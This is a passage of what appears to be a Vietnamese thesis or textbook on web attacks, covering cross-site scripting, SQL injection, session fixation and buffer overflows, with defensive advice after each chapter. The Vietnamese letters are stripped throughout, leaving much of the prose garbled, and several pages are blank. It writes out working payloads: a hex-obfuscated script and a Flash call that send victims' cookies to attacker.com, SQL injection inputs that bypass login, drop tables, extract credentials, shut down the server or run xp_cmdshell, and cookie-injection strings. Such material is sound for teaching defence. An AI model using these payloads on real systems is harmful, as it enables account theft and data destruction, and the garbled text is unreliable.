Sau khi ngi dng nhp vo lin kt Mt phn thng hp dn ang ch bn, cookie trn my nn nhn s b nh cp v l tham s truyn vo cho chng trnh steal.cgi ca hacker. http://www.attacker.com/steal.cgi?lubid=010000508BD3046103F43B8264530098C 20100000000;%20p_uniqid=8sJgk9daas7WUMxV0B;%20gv_titan_20=5901=10195 11286 Vn t ra l c th ngi lp trnh s bo v ng dng Web ca mnh bng cch lc nhng k t c bit nh , hay + (c th trnh trng hp dng du thc hin cu truy vn SQL chng hn) Nhng hacker c th li dng m hex thay cho nhng k t c bit tn cng. Thay th bng nhng s hex cho nhng k t ASCII. V d 5.II-2:
-Trang 48-
Khoa CNTT
Chng 5: Chn m lnh thc thi trn trnh duyt nn nhn (Cross Site Scripting)
http://www.attacker.com/steal.cgi: h -> 0x0068 t -> 0x0074 t -> 0x0074 p -> 0x0070 : -> 0x003A / -> 0x002F Sau y l v d trong cch dng m hex trong ng dng web. V d 5.II-3:
<html> <head> <title>Look at this!</title> </head> <body> <a href="http://hotwired.lycos.com/webmonkey/index1.html?tw=<script>va r u = String.fromCharCode(0x0068);u %2B= String.fromCharCode(0x0074);u %2B= String.fromCharCode(0x0074); u %2B= String.fromCharCode(0x0070);u %2B= String.fromCharCode(0x003A); u %2B= String.fromCharCode(0x002F);u %2B= String.fromCharCode(0x002F); u %2B= String.fromCharCode(0x0061);u %2B= String.fromCharCode(0x0074); u %2B= String.fromCharCode(0x0074);u %2B= String.fromCharCode(0x0061);
-Trang 49-
Khoa CNTT
Chng 5: Chn m lnh thc thi trn trnh duyt nn nhn (Cross Site Scripting)
u %2B= String.fromCharCode(0x0063);u %2B= String.fromCharCode(0x006B); u %2B= String.fromCharCode(0x0065);u %2B= String.fromCharCode(0x0072); u %2B= String.fromCharCode(0x002E);u %2B= String.fromCharCode(0x0063); u %2B= String.fromCharCode(0x006F);u %2B= String.fromCharCode(0x006D); u %2B= String.fromCharCode(0x002F);u %2B= String.fromCharCode(0x0073); u %2B= String.fromCharCode(0x0074);u %2B= String.fromCharCode(0x0065); u %2B= String.fromCharCode(0x0061);u %2B= String.fromCharCode(0x006C); u %2B= String.fromCharCode(0x002E);u %2B= String.fromCharCode(0x0063); u %2B= String.fromCharCode(0x0067);u %2B= String.fromCharCode(0x0069); u %2B= String.fromCharCode(0x003F); u %2B=document.cookie;document.location.replace(u);</script>" onMouseOver="window.status=http://www.hotwired.lycos.com/index2.ht ml';return true" onMouseOut="window.status='';return true">Mt phn thng hp dn ang ch bn </a> </body> </html>
-Trang 50-
Khoa CNTT
Chng 5: Chn m lnh thc thi trn trnh duyt nn nhn (Cross Site Scripting)
nbc.com
Microsoft
Chase
https://www.cha se.com/
EBay
Oracle Japan
http://www.orac le.co.jp/
-Trang 51-
Khoa CNTT
Chng 5: Chn m lnh thc thi trn trnh duyt nn nhn (Cross Site Scripting)
Macromedia Flash cho php lp trnh bng mt ngn ng kch bn c xy dng sn trong Flash l ActionScript. ActionScript c c php n gin v tng t nh JavaScript, C hay PERL. V d hm getURL() dng gi mt trang web khc, tham s thng l mt URL chng hn nh http://www.yahoo.com. V d 5.IV-1:
getURL(http://www.yahoo.com)
V d 5.IV-1 trn s lm xut hin bng thng bo cha cookie ca trang web cha tp tin flash . Nh vy l trang web b tn cng, bng cch chn mt on JavaScript vo ng dng Web thng qua tp tin flash. Mt v d khc r hn v cch tn cng ny l: y l on lnh trong tp tin flash v s c thi hnh khi tp tin flash c c:
getURL(javascript:location(http://www.attacker.com?newcookie=+do cument.cookie))
Nh vy l khi ngi dng xem trang web cha tp tin flash ny th ngay lp tc cookie ca h do trang web cha tp tin flash to ra s gi v cho hacker.
-Trang 52-
Khoa CNTT
Chng 5: Chn m lnh thc thi trn trnh duyt nn nhn (Cross Site Scripting)
V d 5.IV-2: DeviantArt l mt trang web ni ting, cho php thnh vin ca n gi cc tp tin flash ln cho mi thnh vin cng xem. V th hacker c th n cp cookie ca cc thnh vin v cng c th l ti khon ca ngi qun tr web, bng cch ng k lm thnh vin ca ng dng Web ny, gi tp tin flash ln my ch v i cc nn nhn xem tp tin flash . Di y l a ch lin kt dn mt tp tin flash nh trnh by trong v d 5.IV-2:
http://www.deviantart.com/deviation/1386080
Ngoi ra cc trang web cho php thnh vin gi d liu dng HTML nh din n, cc chc nng to ch k ring, cng c th l mc tiu ca cch tn cng ny, bng cch nhp on m gi tp tin flash vo.
<OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/s wflash.cab#version=6,0,0,0" WIDTH="60"
-Trang 53-
Khoa CNTT
Chng 5: Chn m lnh thc thi trn trnh duyt nn nhn (Cross Site Scripting)
HEIGHT="48" id="1" ALIGN=""> <PARAM NAME=movie VALUE="http://www.ke_tan_cong.com/vidu.swf"> <PARAM NAME=quality VALUE=high> <PARAM NAME=bgcolor VALUE=#FF9900> <EMBED src=" http://www.ke_tan_cong.com/vidu.swf" quality=high bgcolor=#FF9900 WIDTH="60" HEIGHT="48" NAME="1" ALIGN="" TYPE="application/x-shockwave-flash" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"> </EMBED> </OBJECT>
-Trang 54-
Khoa CNTT
Chng 5: Chn m lnh thc thi trn trnh duyt nn nhn (Cross Site Scripting)
o Xa nhng k t > , < o Vn cho php nhp nhng k t c bit nhng s c m ha theo chun ring. i vi ngi dng, cn cu hnh li trnh duyt nhc nh ngi dng c cho thc thi ngn ng kch bn trn my ca h hay khng? Ty vo mc tin cy m ngi dng s quyt nh.
Nhn xt:
K thut XSS kh ph bin v d dng p dng, tuy nhin mc thit hi ch dng li mc tn cng trn my nn nhn thng qua nhng lin kt hay form la o m hacker a n cho nn nhn. V th, ngoi vic ng dng kim tra tnh ng n ca d liu trc khi s dng th vic cn nht l ngi dng nn cnh gic trc khi bc vo mt trang Web mi. C th ni, nh vo s cnh gic ca ngi dng th 90% t c s bo mt trong k thut ny. Tuy nhin, trong chng 6, s tn cng li nhm vo my ch, nhm thu thp thng tin trong c s d liu v t ginh quyn qun tr ng dng.
-Trang 55-
Khoa CNTT
Chng 6
-Trang 56-
Khoa CNTT
-Trang 57-
Khoa CNTT
Quy c: Ngn ng lp trnh s dng minh ha trong chng ny l ASP vi c s d liu l SQL Server.
on m trn kim tra chui nhp Username v Password. Nu tn ti trong bng User th check=true ngc li check=false. Gi tri nhp vo l:
Username: OR = Password: OR =
-Trang 58-
Khoa CNTT
Cu lnh so snh trn lun lun ng (v lun bng ). Do cu iu kin trong mnh WHERE lun ng. Gi tr tn ngi s dng ca dng u tin trong bng s c chn. Kt hp vi k t c bit ca SQL : k t ; : nh du kt thc 1 cu truy vn k t -- : n chui k t pha sau n trn cng 1 dng V d 6.III.1-2:
Username: ; drop table User-Password:
Vi cu lnh trn th bng User s b xa hon ton. V d 6.III.1-3: Mt v d khc s dng k t c bit SQL thm nhp vo h thng nh sau:
Username: admin-Password:
-Trang 59-
Khoa CNTT
Cu lnh trn cho php ng nhp vo h thng vi quyn admin m khng i hi password.
Khi nim Quote Injection: Nhng trng hp i s c nhp vo u c ng dng cho vo gia hai du nhy n hay ngoc kp l trng hp Quote Injection. V d III.2.2 V d 6.III.2-2:
StrSQL=SELECT tkUsername FROM User WHERE tkUsername=& tName &
-Trang 60-
Khoa CNTT
v hiu ho du nhy v thay i cu lnh m vn gi c c php ng, chui m chn thm vo phi c mt du nhy n trc chui k t c chn vo v cui cu lnh phi c mt du nhy n, chng hn nh sau:
StrSQL=SELECT = tkUsername FROM User WHERE tkUsername= and
Nu thc hin nh trn m thng bo li c lin quan n du ( th trong chui chn vo phi c ): V d 6.III.2-3: Gi s:
StrSQL=SELECT tkUsername FROM User WHERE (tkUsername=& tName & )
Th c php hp l nh sau:
StrSQL=SELECT = tkUsername FROM User WHERE (tkUsername=)or
Ngoi ra k t % thng c dng trong nhng trng hp tm kim thng tin. V d 6.III.2-4:
StrSQL=SELECT tkUsername FROM User WHERE tkUsername like % & tName &
-Trang 61-
Khoa CNTT
Cu lnh trn tr v mt tp kt qu l s kt hp gia tkUsername vi tkPassword trong bng User. Ghi ch: S ct trong hai cu SELECT phi khp vi nhau. Ngha l s lng ct trong cu lnh SELECT ban u v cu lnh UNION SELECT pha sau bng nhau v cng kiu. Nh vo li c php tr v sau khi chn thm cu lnh UNION m c th bit kiu ca mi trng.
-Trang 62-
Khoa CNTT
Sau y l nhng v d c thc hin khi khng bit ni dung c s d liu da vo HAVING, GROUP BY, UNION: V d 6.III.4-2: Nhc li cu truy vn cn ng nhp:
SQLQuery= & SELECT tkUsername,tkPassword FROM User WHERE tkUsername= & strUsername & AND Password= & tkPassword
u tin, bit tn bng v tn trng m cu truy vn s dng, s dng cu iu kin having , nh v d sau: Gi tr nhp vo:
Username: having 1=1--
Li pht sinh:
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'User.tkUsername' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
Nh vo li pht sinh ny m bit c bng s dng trong cu truy vn l User v trong bng tn ti mt trng tn l tkUsername. Sau s dng GROUP BY: V d 6.III.4-3:
Username: group by User.tkUsername having 1=1--
-Trang 63-
Khoa CNTT
Li pht sinh:
[Microsoft][ODBC SQL Server Driver][SQL Server] Column'User.tkPassword'is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
Nh vy tkPassword l mt trng ca bng User v c s dng trong cu truy vn. Tip tc dng GROUP BY cho n khi bit c tt c cc trng trong bng User tham gia vo cu truy vn. Khi khng cn bo li c php GROUP BY na th chuyn qua cng on kim tra kiu ca tng trng trong bng. Lc ny UNION c s dng: V d 6.III.4-4:
Username:union select sum(tkUsername) from User
Lnh sum l lnh tnh tng cho i s bn trong du ngoc. i s phi l kiu s. Nu i s khng l kiu s th pht sinh li nh sau:
[Microsoft][ODBC an argument. SQL Server Driver][SQL Server]The sum or
-Trang 64-
Khoa CNTT
Vi phng php trn, d dng xc nh c kiu ca tng trng trong bng. Sau khi nhn y trng tin trn th hacker d dng t thm thng tin vo bng User. V d 6.III.4-5:
Username:; insert into User(tkUsername,tkPassword) values (admin, )--
Hacker thm ni dung nh V d 6.III.4.2.4 by gi tr thnh ngi qun tr mng m khng cn mt khu chng thc. V d 6.III.4-6: minh ho mt cng on s gip hacker c ht thng tin trong bng User: Bc 1: To mt Stored procedure chp vo tt c thng tin ca 2 trng tkUsername v tkPassword trong bng User thnh mt chui vo mt bng mi l foo c mt trng l ret bng on m sau:
create proc test as begin declare @ret varchar(8000) set @ret=':' select @ret=@ret+' '+tkUsername+'/'+tkPassword from User select @ret as ret into foo end
-Trang 65-
Khoa CNTT
Bc 2: Gi Stored procedure Sau khi to c stored procedure nh trn, thc hin li gi hm:
Username:;exec test
Li pht sinh:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC Server]Syntax error SQL Server varchar Driver][SQL value ': convertingthe
Qua mt s cng on, hacker thu c ni dung ca bng User gm c tn tkUsername v mt khu tkPassword. Bc 4: Ngoi ra hacker cn c th cn thn xo bng foo xo du vt:
Username: ; drop table foo--
V d 6.III.4-7: Cn y l mt cch khc xc nh ni dung ca bng User, cn mt phng php tm kim thng tin nh sau: Bc 1: Tm tun t tng dng trn bng User
Username:union select 1,1
-Trang 66-
Khoa CNTT
hoc :
Username:union tkUsername> a-select min(tkUsername),1 from User where
Li pht sinh:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC int. SQL Server Driver][SQL Server]Syntax error converting the varchar value 'admin' to a column of data type
Ngi u tin trong bng User l admin. Bc 2: bit cc gi tr tip theo, nhp chui sau:
Username:;select min(tkUsername),1 from User where tkUsername> adminunion select 1,1 from User
Li pht sinh:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC converting the varchar value 'nhimmap' to a column of data type int. SQL Server Driver][SQL Server]Syntax error
Bc 3: Thc hin nh bc 2 cho ra kt qu l tng dng vi trng tkUsername trong bng User.
-Trang 67-
Khoa CNTT
Li pht sinh:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC converting the varchar value 'passOfAdmin' to a column of data type int. SQL Server Driver][SQL Server]Syntax error
bit thng tin v cc bng, ct trong c s d liu, c th truy vn bng n bng h thng INFORMATION_SCHEMA.TABLES. V d 6.III.4-8:
select TABLE_NAME from INFORMATION_SCHEMA.TABLES
INFORMATION_SCHEMA.TABLES cha thng tin v tt c cc table c trn server. Trng TABLE_NAME cha tn ca mi table trong c s d liu.
SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE
TABLE_NAME='User'
Cu lnh trn c s dng bit thng tin v ct trong bng. Ngoi ra cn c th dng UNION bit cc bin mi trng ca SQL Server.
-Trang 68-
Khoa CNTT
V d 6.III.4-9: bit ng dng ang chy trn Server no, c th xc nh bng cch sau:
Username:;select @@SERVERNAME union select 1
Li pht sinh:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'KHOAI_NGU' to a column of data type int.
-Trang 69-
Khoa CNTT
-Trang 70-
Khoa CNTT
R rng l, n ngn chn c tt c nhng kiu tn cng trn. Tuy nhin nu mun to ra mt chui gi tr m khng dng cc du nhy, c th dng hm char() nh v d sau: V d 6.III.7.1-2:
INSERT into User VALUES(666, +char(0x73) char(0x63) ,char(0x63) +char(0x68) +char(0x68) +char(0x72) char(0x69)
V d 6.III.7.1-3 trn tuy l mt cu truy vn khng c du nhy n no nhng n vn c th insert chui vo bng, v tng ng vi:
INSERT into User VALUES( 666,chris,chris,255)
-Trang 71-
Khoa CNTT
(nhng trong c s d liu s lu l admin--) Gi s rng ng dng cho php ngi dng thay i mt khu. Cc on m ASP c thit k m bo rng ngi s dng phi nhp ng mt khu c trc khi nhp mt khu mi. on m nh sau:
username = escape( Request.form("username") ); oldpassword = escape( Request.form("oldpassword") ); newpassword = escape( Request.form("newpassword") ); var rso = Server.CreateObject("ADODB.Recordset"); var sql = "select * from users where username = '" + username + "' and password = '" + oldpassword + "'"; rso.open( sql, cn ); if (rso.EOF) { Cu truy vn thit lp mt khu mi nh sau: sql = "update users set password = '" + newpassword + "' where username= '" + rso("username") + "'"
-Trang 72-
Khoa CNTT
update
users
set
password
'password'
where
username
'admin'--'
Nh hacker c th thay i mt khu ca admin bng gi tr ca mnh. y l 1 trng hp cn tn ti trong hu ht nhng ng dng ln ngy nay c s dng c ch loi b d liu. Gii php tt nht l loi b nhng gi tr li hn l chnh sa li. Nhng c mt vn l c mt s nhp d liu (nh nhp tn) cho php nhng k t ny. V d: OBrien. Cch tt nht gii quyt vn ny l khng cho php nhp du nhy n. Nu iu ny khng th thc hin c , th loi b v thay th nh trn. Trong trng hp ny, cch tt nht l m bo tt c d liu c a vo cu truy vn SQL (k c nhng gi tr trong c s d liu) phi c kim sot mt cch cht ch. Mt s ng dng phng chng vic thm cu truy vn t ngi dng bng cch gii hn chiu di ca nhp. Tuy nhin, vi gii hn ny th mt s kiu tn cng khng th thc hin c nhng vn c ch h hacker li dng. V d 6.III.7.2-2: Gi s c username v password u b gii hn ti a l 16 k t. Nhp:
Username: aaaaaaaaaaaaaaa Password :; shutdown--
-Trang 73-
Khoa CNTT
ng dng s thay th mt du nhy n bng hai du nhy n nhng do chiu di chui b gii hn ch l 16 k t nn du nhy n va c thm s b xo mt. Cu lnh SQL nh sau:
Select * from users where username=aaaaaaaaaaaaaaa and password=; shutdown
ngay c khi sp_password xut hin trong phn ch thch. V th du tt c cu truy vn tn cng, ch cn n gin l thm sp_password vo sau -- nh sau:
-Trang 74-
Khoa CNTT
Username:admin--sp_password
III.7.4. Dng Extended Stored Procedure III.7.4.1. Dng Extended Stored Procedure c sn trong h thng
SQL Server
Nu ci SQL Server ch mc nh th SQL Server chy trn nn SYSTEM, tng ng mc truy cp Windows. C th dng master..xp_cmdshell thi hnh lnh t xa:
; exec master..xp_cmdshell 'ping 10.10.1.2'--
Th dng du nhy i (") nu du nhy n (') khng lm vic. Di y l mt s extended stored procedure m hacker thng hay s dng thc thi nhng cu lnh xem ni dung thng tin trong my nn nhn:
hin th nhng a hin hnh trn my hin th tt c cc th mc k c th mc con Ly thng tin v ch bo mt trn server cho php ngi s dng to cc tp tin lu tr trn Server (hay bt c tp tin no m server c th truy x
-Trang 75-
Khoa CNTT
Xp_ntsec_enumdomain lit k nhng domain m server c th truy vn. Xp_terminate_process chm dt mt tin trnh vi tham s PID ca n.
Sau c th thc thi n nh l thc thi extended stored procedure thng thng :
exec xp_webserver
-Trang 76-
Khoa CNTT
Sau chy cu lnh bulk insert chp d liu t tp tin vo bng V d 6.III.7.4.3-2:
bulk insert foo from c:\inetpub\wwwroot\process_login.asp
Ni dung trang process_login.asp c th ly v bng cch dng nhng k thut nh trong V d 6.III.7.4-3.
-Trang 77-
Khoa CNTT
o d liu nhp do ngi dng trnh o cc tham s t URL o cc gi tr t cookie i vi cc gi tr numeric, hy chuyn n sang integer trc khi thc hin cu truy vn SQL, hoc dng ISNUMERIC chc chn n l mt s integer. Dng thut ton m ho d liu
-Trang 78-
Khoa CNTT
Th hai, l vn ca trng hp b tn cng 2 tng (second-oder SQL injection) trong vic ly d liu t h thng ra. Gii php 2: b v hiu trong cc trng hp nh gii php 1 l do : D liu bt hp l lun lun thay i v cng vi vic pht trin cc kiu tn cng mi. Gii php 3: tt hn hai gii php kia, nhng s gp mt s hn ch khi ci t. Cch bo mt tt nht l kt hp c gii php 2 v 3. Mt v d cho s cn thit kt hp 2-3 l du ni gia h v tn Quentin Bassington-Bassington phi cho php du gch ngang trong b nh ngha d liu hp l, nhng chui k t -- l mt chui k t c bit trong SQL server. V d nu c b lc : Lc b nhng d liu bt hp l nh --,select v union Mt hm kim sot loi b du nhy n th c th i ph nh sau.
union select @@version--
-Trang 79-
Khoa CNTT
-Trang 80-
Khoa CNTT
-Trang 81-
Khoa CNTT
Kim tra lp sa cha ca server o C mt s cch tn cng nh buffer overflow, format string thng ch n lp bo v ny. Kim tra cc phin lm vic trn server Thay i "Startup v chy SQL Server" mc ngi dng quyn hn thp trong SQL Server Security.
Nhn xt:
Qua chng 6 ny, cng thy rng vic kim tra d liu trc khi x l l cn thit. ng dng ngoi vic kim tra tnh ng n ca d liu, cn m ha d liu ngay bn trong c s d liu v khng cho xut trang Web li, bo ni dung li c php SQL hacker khng th thu thp thng tin c s d liu. Song song l cng vic ca ngi qun tr mng.
-Trang 82-
Khoa CNTT
Chng 7
-Trang 83-
Khoa CNTT
-Trang 84-
Khoa CNTT
-Trang 85-
Khoa CNTT
Bc 2: Gi ID ny n trnh duyt nn nhn. Hacker gi session ID va to n ngi dng v vic trao i ID session cn ty vo ng dng m c th qua URL, bin n form hay cookie. Cc cch tn cng thng dng gm: o Tn cng session ID trn tham s URL. o Tn cng session ID bng bin n form. o Tn cng session ID trong cookie. Bc 3: t nhp vo phin lm vic ca nn nhn. Sau khi nn nhn ng nhp vo h thng qua session ID c ch nh sn v cha thot khi ng dng, hacker lc ny bt u dng session ID bc vo phin lm vic ca nn nhn.
-Trang 86-
Khoa CNTT
Hnh 7.II-2: M t chi tit qu trnh thc hin tn cng ngi dng bng k thut n nh phin lm vic.
-Trang 87-
Khoa CNTT
1. Hacker m dch v trc tuyn ca ngn hng thng qua a ch online.worldbank.com 2. Nhn c mt session ID t trnh ch xc nh phin lm vic ca hacker. V d session ID c gi tr l 1234. 3. Sau hacker s tm cch gi mt lin kt n mt ngi dng no c ti khon trong ngn hng ny. Nhng lin kt thng l dn n trang ng nhp vo ti khon trong ngn hng v d lin kt l http://online.workbank.com/login.jsp?sessionid=1234, la ngi dng lm vic trong phin lm vic ca hackerkhi ngi dng nhn c lin kt ny,
-Trang 88-
Khoa CNTT
4. Ngi dng b mc la v m ng dng Web bng lin kt ca hacker. Do c session ID (ca hacker) nn trnh ch s khng to mt session ID mi. 5. Ngi dng vn tip tc ng nhp vi thng tin ca mnh qun l ti khon. 6. Khi hacker s vo ti khon ca ngi dng m khng cn phi ng nhp v c cng phin lm vic. Nhn xt: Cch tn cng ny i hi ng dng phi to session ID ngay khi ngi dng s dng ng dng. D b pht hin bi ngi dng.
-Trang 89-
Khoa CNTT
C th l: a) Thit lp mt cookie trn trnh duyt bng ngn ng kch bn: Hu ht trnh duyt u h tr cc ngn ng kch bn thc thi trn trnh duyt nh Javascript, VBScript. C hai ngn ng ny c th thit lp mt cookie cho trnh duyt bng cch thit lp gi tr document.cookie. V d 7.II.3-1:
http://online.workbank.com/<script>document.cookie= sessionid=1234; domain= .workbank.com;</script>.idc
Bn cnh , hacker c th thit lp thi gian sng cho cookie, domain cookie v cch ny ph hp vi nhng h thng hng t do. V d domain no thuc .workbank.com u c th c c gi tr cookie ny. b) Dng th <META> vi thuc tnh Set-Cookie: ng dng cng c th thit lp cookie cho trnh duyt bng th <META> trong HTML. V d 7.II.3-2:
< meta http-equiv= Set-Cookie content=sessionid=1234>
Meta tag Injection (Thm th meta): Vi nhng h thng kim tra i s vi th <SCRIPT> th k thut XSS gp nhiu kh khn, do thm th <META> l phng php kh hu hiu cho php thao tc trn cookie. Thng thng th <META> c t gia th
-Trang 90-
Khoa CNTT
Phng php ny chim u th hn XSS ch khng b ph hy trong IE ( khng cho php thao tc cc ngn ng kch bn trn trnh duyt), ngoi tr th <META REFRESH> c) Thit lp cookie dng thuc tnh Set-Cookie trong header HTTP response: Cch ny thit lp mt cookie cho trnh duyt bng cch dng Set-Cookie trong header HTTP thng qua k thut tn cng DNS server,
-Trang 91-
Khoa CNTT
ca ngi dng khi ng nhp v lun to mt session ID mi khi ngi dng ng nhp thnh cng. Bin php 2: Phng chng nhng hacker bn ngoi h thng Vic to ng dng trn h thng theo hng gii hn ( ch to mt session ID mi cho ngi dng sau khi h thnh cng ) s khin cho nhng hacker khng phi l ngi dng hp l ca h thng khng th s dng phng php tn cng ny. Bin php 3: Gii hn phm vi ng dng ca session ID o Kt hp Session ID vi a ch ca trnh duyt. o Kt hp Session ID vi thng tin chng thc c m ho SSL ca ngi dng. o Xa b session khi ngi dng thot khi h thng hay ht hiu lc, c th thc hin trn trnh ch hoc trnh duyt (cookie) o Ngi s dng phi dng ch thot khi h thng xa b session hin thi v c th nhng session ID cn lu li trn h thng khi h qun thot ra ngoi nhng ln trc o Thit lp thi gian ht hiu lc cho session, trnh trng hp hacker c th duy tr session v s dng n lu di.
-Trang 92-
Khoa CNTT
-Trang 93-
Khoa CNTT
III.1. S khc bit gia nh cp phin lm vic (session hijacking) v n nh phin lm vic (session fixation)
-Trang 94-
Khoa CNTT
Session fixation
- Tn cng vo trnh duyt - Tn cng vo trnh duyt ca ca nn nhn sau khi nn nn nhn trc khi nn nhn nhn ng nhp vo h ng nhp vo h thng thng
nh hng
- Ginh c quyn truy - Hacker ginh c quyn cp mt ln. truy cp 1 ln, tm thi, hoc thi gian di trong mi ln tn cng vo phin lm vic ca nn nhn
Duy tr phin lm - Khng yu cu s duy tr C th yu cu duy tr session vic Hng tn cng phin lm vic cho n khi nn nhn ng nhp 1. Khai thc l hng XSS 1. Yu cu ngi dng ng trn my ch nhp vo h thng thng qua 2. Chp ly session ID mt lin kt hay mt form trong phn HTTP Header b thay i. Referer gi n cho Web 2. Khai thc l hng XSS trn server khc bt k mt my ch no trn 3. Khai thc lu lng domain ca nn nhn mng ( vi nhng lin kt 3. Khai thc l hng trong th n my ch khng c <META> trn bt k mt my m ho) ch no trn domain ca nn nhn 4. Thm mt Server c kh nng to session ID cng
-Trang 95-
Khoa CNTT
domain vi my ch vo trong my ch DNS ca nn nhn. 5. Thay i lu lng mng Mc tiu - Trnh ch - Communication link - Tt c my ch trn domain ch. - My ch DNS - Trnh ch - Communication link
Nhn xt:
K thut tn cng ny li dng s lng lo trong vic qun l phin lm vic ca ng dng ng thi nhm n nhng ngi s dng thiu cn trng trong vic truy cp mt ng dng Web. Trong cc chng c cp, ch c k thut XSS v qun l phin lm vic l li dng s thiu thn trng ca ngi dng.
-Trang 96-
Khoa CNTT
Chng 8
TRN B M
Ni dung: I. II. III. IV. Khi nim S t chc ca b nh Mt s cch gy li trn b m qua ng dng Web Cch phng chng
-Trang 97-
Khoa CNTT
I. KHI NIM
Buffer overflow tng l l hng trong h thng bo mt ca UNIX t nhiu nm nay nhng ch c cng b sau bui tho lun ca Dr. Mudge trong ti liu 1995 Bng cch no vit mt chng trnh khai thc l hng Buffer Overflow(1) Vi k thut Buffer Overflow, cho php mt s lng ln d liu c cung cp bi ngi dng m vt qu lng b nh cp pht ban u bi ng dng do gy cho h thng lm vo tnh trng trn b nh, thm ch c th b chn thm mt on m bt k. Nu ng dng c cu hnh c thc thi nh root th ngi tn cng c th thao tc nh mt nh qun tr h thng ca web server. Hu ht nhng vn u pht sinh t kh nng lp trnh yu km ca nhng nh lp trnh. n c l s cu th trong kim tra kch thc d liu nhp vo. V d 8.I-1:
func(char *ch) { char buffer[256]; strcpy(buffer,ch); }
Buffer ch c cp pht 256 byte nhng hm func, nu buffer nhn 257 k t t ch th li trn b m.
-Trang 98-
Khoa CNTT
K thut khai thc li trn b m (buffer overflow exploit) c xem l mt trong nhng k thut hacking kinh in nht. Chng 5 c chia lm 2 phn: Phn 1: T chc b nh, stack, gi hm, shellcode. Gii thiu t chc b nh ca mt tin trnh (process), cc thao tc trn b nh stack khi gi hm v k thut c bn to shellcode - on m thc thi mt giao tip dng lnh (shell). Phn 2: K thut khai thc li trn b m. Gii thiu k thut trn b m c bn, t chc shellcode, xc nh a ch tr v, a ch shellcode, cch truyn shellcode cho chng trnh b li. Cc chi tit k thut minh ho y c thc hin trn mi trng Linux x86 (kernel 2.2.20, glibc-2.1.3), tuy nhin v mt l thuyt c th p dng cho bt k mi trng no khc.
-Trang 99-
Khoa CNTT
Mi tin trnh thc thi u c h iu hnh cp cho mt khng gian b nh o (logic) ging nhau. Khng gian nh ny gm 3 vng: text, data v stack. ngha ca 3 vng ny nh sau: Vng Text l vng c nh, cha cc m lnh thc thi (instruction) v d liu ch c (read-only). Vng ny c chia s gia cc tin trnh thc thi cng mt file chng trnh v tng ng vi phn on text ca file thc thi. D liu vng ny l ch c, mi thao tc nhm ghi ln vng nh ny u gy li segmentation violation. Vng Data cha cc d liu c khi to hoc cha khi to gi tr. Cc bin ton cc v bin tnh c cha trong vng ny. Vng Stack l vng nh c dnh ring khi thc thi chng trnh dng cha gi tr cc bin cc b ca hm, tham s gi hm cng nh gi tr tr v. Thao tc trn b nh stack c thao tc theo c ch "vo sau ra trc" - LIFO (Last In, First Out) vi hai lnh quan trng nht l PUSH v POP. Trong phm vi bi vit ny, lun vn ch tp trung tm hiu v vng stack.
II.1. Stack
Stack l vng nh dng lu cc tham s v cc bin cc b ca hm, gi tr EBP ( a ch y Stack ), a ch tr v. Cc bin c cp pht t vng nh cao n vng nh thp. Stack hot ng theo nguyn tc "vo sau ra trc"(Last In First Out - LIFO). Cc gi tr c y vo stack sau cng s c ly ra khi stack trc tin.
-Trang 100-
Khoa CNTT
PUSH mt gi tr vo stack
(1) ESP=ESP-kch thc ca gi tr (2) Value c y vo stack POP mt value ra khi stack
-Trang 101-
Khoa CNTT
-Trang 102-
Khoa CNTT
0x401F2034 gi th tc Q -> th tc Q c gi thc thi 0x401F2035 0x40209876 th tc Q 0xFFFFFFFF Khi lnh ti a ch 0x401F2034 c thc thi th khng gian a ch nh sau: 0x0012FF00----------------------------nh Stack 0x0012FF01 0x0012FF02 0x0012FF03 0x0012FF04 0x0012FF05 0x0012FF06 0x0012FF07 0x0012FF08----------------------------y Stack . 40 1F 20 35
Nh vy a ch sau a ch gi th tc c a vo trong STACK. Khi th tc Q chun b hon thnh nhim v ca mnh v sn sng quay tr v th tin trnh nhn li a ch lu trc STACK v khi phc li vic thc thi. a ch ny c gi l saved return address. Ghi ch: Thanh ghi EIP lun tr n a ch ca cu lnh tip theo cn thi hnh
-Trang 103-
Khoa CNTT
V d 8.II.3-2:
strcpy(one,two); printf("Okie\n");
th return address s tr ti v tr ca lnh gi ti hm printf trong b nh, v khi hm strcpy kt thc th con tr lnh s ch ti .
-Trang 104-
Khoa CNTT
(1) Lp trn b m (n return addr) bng a ch ca buffer (2) t shellcode vo buffer Nh vy a ch tr v s tr n shellcode, shellcode s mt root shell. Tuy nhin, tht kh lm cho ret addr tr n ng shellcode. Mt cch c th thc hin c cng vic kh khn , l t vo u ca buffer mt dy lnh NOP(NO oPeration - khng x l), tip theo y shellcode vo sau NOPs. Nh vy khi thay i ret addr tr n mt ni ny u buffer, cc lnh NOP s c thi hnh, chng khng lm g c. n khi gp cc lnh shellcode, shellcode s lm nhim v root shell. Stack c dng nh sau:
y ca b nh nh ca b nh <----- FFFFF NNNNNNNNNNNSSSSSSSSSSSSSSAAAAAAAAFFFFFFFFF nh ca stack y ca stack N = NOP S = shellcode A = con tr n shellcode F = cc data khc
-Trang 105-
Khoa CNTT
Nhn xt:
y l k thut tn cng i su vo phn h thng nht, i hi hacker l ngi hiu su v t chc b nh cng nh v ngn ng lp trnh Assembly. Tuy nhin, iu ny ch i hi nu hacker mun iu khin h thng. Nu ch sa i ni dung kch thc nhp t a ln trnh ch mt khi d liu ln h thng c th b ph hy v khng dung lng p ng vic yu cu x l khi d liu . Kiu tn
-Trang 106-
Khoa CNTT
cng ny tng t nh kiu tn cng t chi dch v c ni r hn trong chng tip theo.
-Trang 107-
Khoa CNTT
Chng 9
T CHI DCH V
Ni dung: I. II. III. IV. Khi nim Nhng kh nng b tn cng bng DoS Cc k thut tn cng Bin php phng chng
-Trang 108-
Khoa CNTT
I.
KHI NIM
